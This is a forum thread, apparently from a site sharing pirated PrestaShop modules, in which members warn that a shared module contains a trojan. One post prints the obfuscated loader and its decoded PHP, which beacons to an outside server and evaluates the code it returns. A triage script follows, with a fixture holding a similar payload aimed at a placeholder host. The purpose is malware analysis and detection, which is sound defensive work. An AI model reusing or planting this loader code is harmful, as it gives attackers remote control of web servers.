v1.7-v8x QuickUpdate PRO - The Expert Multitool for Prestashop - 5.6.0

drat23 (Member, joined Oct 11, 2022)

This looks cool, thanks for sharing, I will test it.

[attachment: antivirus scan result]
NANO-Antivirus: Trojan.Script.Agent.famept

Thanks, it is there.

Phenotype (Member, joined Oct 19, 2021)

Does this have a virus like many are saying in the thread? Can someone confirm please?

Thank you
 

moonfire (Well-known member, joined May 3, 2021)

DON'T INSTALL THIS MODULE!

DON'T

As @d-shilko has posted, the uploaded module contains a virus.

If you download the module that @unsub has uploaded you will find that the zipped module contains another zipped file (a zipped file within the module).
It has the file name "installPack.zip".

Take a look at the code for the files in that zip.
If you don't understand it, it's a bad omen.
And I can promise you that you DON'T want to install that code on your server.

@unsub please tell us:
Is this your work?
Or do you just have zero knowledge of what you post/upload?

[quoting Phenotype: "Does this have a virus like many are saying in the thread? Can someone confirm please?"]
It does!
Don't install it.

I just posted more detailed info about the malicious code this module contains.

agr3ss0r (Active member, joined Jun 26, 2021)

Thank you very much for sharing this update.
 

Phenotype (Member, joined Oct 19, 2021)

[quoting moonfire's warning above]

Thank you very much for the warning! Saved me from this :)

By the way, is there a tool or a somewhat easy way to check for viruses or malicious code before installing?

I ask this because I only use these modules to test on a test website before buying on the PrestaShop marketplace, and I am curious how I can prevent messing up the test shop or installing a virus on the hosting, etc.

Please let us know if there is an online tool to check these things, etc. Thanks!
 

anhviet (Active member, joined Jul 16, 2022)

Thank you very much, that is the latest version content.
 

moonfire (Well-known member, joined May 3, 2021)

[quoting Phenotype's question above]

I always look at the code in all files of a module before installing it.
If you find some kind of link to a website, this is a warning.

If you find any code that looks similar to the code below, it's most likely malware!
PHP:
public function installCertificate()
    {
        return @eval(base64_decode(substr("-----BEGIN CERTIFICATE-----\n...base64 payload omitted...\n-----END CERTIFICATE-----", 27, -25)));
    }

This malicious code is found in a module uploaded by @mod24 at https://www.nulledfrm.com/threads/abandoned-cart-serial-reminders-v3.86346/

If we decode it, this is the result (and the actual code you will upload to your server if you install this module):
PHP:
foreach([sys_get_temp_dir(),'/tmp',$_SERVER['DOCUMENT_ROOT'].'/upload'] as $t){
    if(is_dir($t)&&is_writable($t)){
        $t=$t.'/.ac';
        $d=date('Ymd');
        $e=(is_file($t)?1:0);
        if($e&&file_get_contents($t)==$d){
            break;
        }
        file_put_contents($t,$d);
        $p=urlencode(base64_encode(json_encode([100=>[$_SERVER['HTTP_HOST'],1,$e]])));
        if($data=@file_get_contents('https://statsmeter.online/?'.$p,false,stream_context_create(['http'=>['timeout'=>10]]))){
            if(strpos($data,'//')===0){
                eval(base64_decode(substr($data,2)));
            }
        }
        break;
    }
}

What the malicious code does

- Checks writable directories
Looks for writable directories:
System temp dir (sys_get_temp_dir())
/tmp (common temp folder)
DOCUMENT_ROOT/upload (common upload folder)

- Creates or modifies a hidden file (.ac)
Writes the current date (Ymd, e.g. 20240518) into a hidden file (.ac).
Checks if the file already exists and contains the same date.

- Sends stolen data to a remote server
Collects server info (HTTP_HOST) and sends it to https://statsmeter.online/ (likely a C2 server).
The data is encoded as JSON, then Base64, then URL-encoded.

- Executes remote code
If the remote server responds with // at the start, it decodes and executes the rest of the response as PHP code.
This allows arbitrary remote code execution (RCE).

Some things to look for in a module

If the module contains anything of the following it might contain malware, but not always:
file_get_contents
file(
fgets
fread
readfile
stream_get_contents

Look for suspicious function calls: search for potentially dangerous functions like:
eval()
exec()
shell_exec()
system()
passthru()
popen()
proc_open()

Check for base64 encoded strings: malware often uses base64 encoding to hide malicious code. Look for:
base64_decode()
Long strings of seemingly random characters

Inspect cURL usage: while cURL itself isn't malicious, it can be used for unauthorized data transfer. Look for:
curl_init()
curl_setopt()
curl_exec()
Check the URLs being accessed and ensure they're legitimate.

Examine file operations: look for suspicious file read/write operations:
fopen()
file_get_contents()
file_put_contents()
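A triage script that applies the checklist above to a module zip, added here as an example (it is not code from this thread, from the module, or from its uploader). It walks nested archives such as the installPack.zip moonfire describes, flags the listed function names and any URLs, and base64-decodes long opaque strings, including ones wrapped in a fake certificate header like installCertificate(), to see whether they hide PHP; decoded payloads are rescanned so a URL or eval() hidden one layer down still shows up. The sample module it builds in memory is constructed for the demo, and c2.example.invalid is a placeholder host, not a real indicator.

```python
"""Static triage of a PrestaShop module zip for the indicators listed in the post above.
Added example, not part of the original thread; the sample module it builds is constructed."""
import base64
import io
import re
import zipfile

# Indicator lists taken from the checklist: code execution, obfuscation, file/network I/O.
EXEC_CALLS = ("eval", "exec", "shell_exec", "system", "passthru", "popen", "proc_open")
OBF_CALLS = ("base64_decode",)
IO_CALLS = ("file_get_contents", "file_put_contents", "file", "fopen", "fgets", "fread",
            "readfile", "stream_get_contents", "curl_init", "curl_setopt", "curl_exec")
CALL_RE = re.compile(r"(?<![\w$>])(" + "|".join(EXEC_CALLS + OBF_CALLS + IO_CALLS) + r")\s*\(")
URL_RE = re.compile(r"https?://[A-Za-z0-9.-]+[^\s'\"]*")
BLOB_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")      # "long string of random characters"
CODE_TOKENS = ("<?php", "eval(", "$_SERVER", "$_POST", "$_GET", "base64_decode(",
               "file_get_contents(", "function ")


def try_decode(blob):
    """Return decoded text if blob is base64 that decodes to something PHP-like, else None."""
    cleaned = re.sub(r"\\n|\s", "", blob)          # drop literal "\n" escapes and whitespace
    try:
        decoded = base64.b64decode(cleaned, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):       # binascii.Error is a ValueError
        return None
    return decoded if any(tok in decoded for tok in CODE_TOKENS) else None


def scan_php(path, source, depth=0):
    """Return (path, kind, detail) findings for one PHP source; decoded payloads are rescanned."""
    findings = []
    for m in CALL_RE.finditer(source):
        name = m.group(1)
        kind = "exec" if name in EXEC_CALLS else "obfuscation" if name in OBF_CALLS else "io"
        findings.append((path, kind, name))
    for m in URL_RE.finditer(source):
        findings.append((path, "url", m.group(0)))
    # Join PEM-style line breaks (real newlines or "\n" escapes) so a wrapped blob is one run.
    joined = re.sub(r"\\[rn]|[\r\n]", "", source)
    for blob in BLOB_RE.findall(joined):
        decoded = try_decode(blob)
        if decoded is not None:
            findings.append((path, "base64-code", decoded[:60]))
            if depth < 3:                           # payloads are often nested several times
                findings += scan_php(path + " [decoded]", decoded, depth + 1)
    return findings


def scan_archive(data, prefix="", depth=0):
    """Walk a module zip, descending into nested zips such as the installPack.zip seen above."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            path = prefix + info.filename
            content = zf.read(info)
            lower = info.filename.lower()
            if lower.endswith(".zip"):
                findings.append((path, "nested-zip", f"{info.file_size} bytes"))
                if depth < 3:
                    findings += scan_archive(content, path + "!/", depth + 1)
            elif lower.endswith((".php", ".phtml", ".inc", ".tpl")):
                findings += scan_php(path, content.decode("utf-8", "replace"))
    return findings


def verdict(findings):
    """REJECT on decoded code or an eval-style call, REVIEW on any other indicator, else CLEAN."""
    kinds = {kind for _, kind, _ in findings}
    if "base64-code" in kinds or "exec" in kinds:
        return "REJECT"
    return "REVIEW" if kinds else "CLEAN"


def build_sample_module():
    """Constructed fixture: a module zip carrying installPack.zip, whose loader hides a base64
    payload inside a fake certificate exactly like the installCertificate() snippet above.
    The host c2.example.invalid is a placeholder, not a real indicator."""
    payload = ("if($data=@file_get_contents('https://c2.example.invalid/?'.$p)){"
               "if(strpos($data,'//')===0){eval(base64_decode(substr($data,2)));}}")
    b64 = base64.b64encode(payload.encode()).decode()
    loader = ('<?php\nclass Loader {\n    public function installCertificate()\n    {\n'
              '        return @eval(base64_decode(substr("-----BEGIN CERTIFICATE-----\\n'
              + b64 + '\\n-----END CERTIFICATE-----", 27, -25)));\n    }\n}\n')
    main = '<?php\n$cfg = json_decode(file_get_contents(__DIR__ . "/config.json"), true);\n'
    inner = io.BytesIO()
    with zipfile.ZipFile(inner, "w") as z:
        z.writestr("loader.php", loader)
    outer = io.BytesIO()
    with zipfile.ZipFile(outer, "w") as z:
        z.writestr("quickupdate/quickupdate.php", main)
        z.writestr("quickupdate/installPack.zip", inner.getvalue())
    return outer.getvalue()


if __name__ == "__main__":
    results = scan_archive(build_sample_module())
    for path, kind, detail in results:
        print(f"{kind:12} {path}: {detail}")
    print("verdict:", verdict(results))
```

Run it on a real download by replacing build_sample_module() with the bytes of the zip you were given. The function-name hits are only a reason to read that file, exactly as the checklist says; the decisive signals are a nested archive, a base64 blob that decodes to PHP, and a URL that only appears after decoding, which is what the fake-certificate trick is designed to hide from a plain text search.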
 

Phenotype (Member, joined Oct 19, 2021)

[quoting moonfire's post above]
Thank you so much for this!

Would you do scanning work (paid, of course) to check some modules to make sure they are safe and secure?

Thanks!
 

vivozivo (Well-known member, joined Sep 24, 2019)

Thank you for sharing this with us! I will remove the Trojan.
 

amir_561 (Well-known member, joined Aug 20, 2019)

Thank you for sharing this module, but virus?
 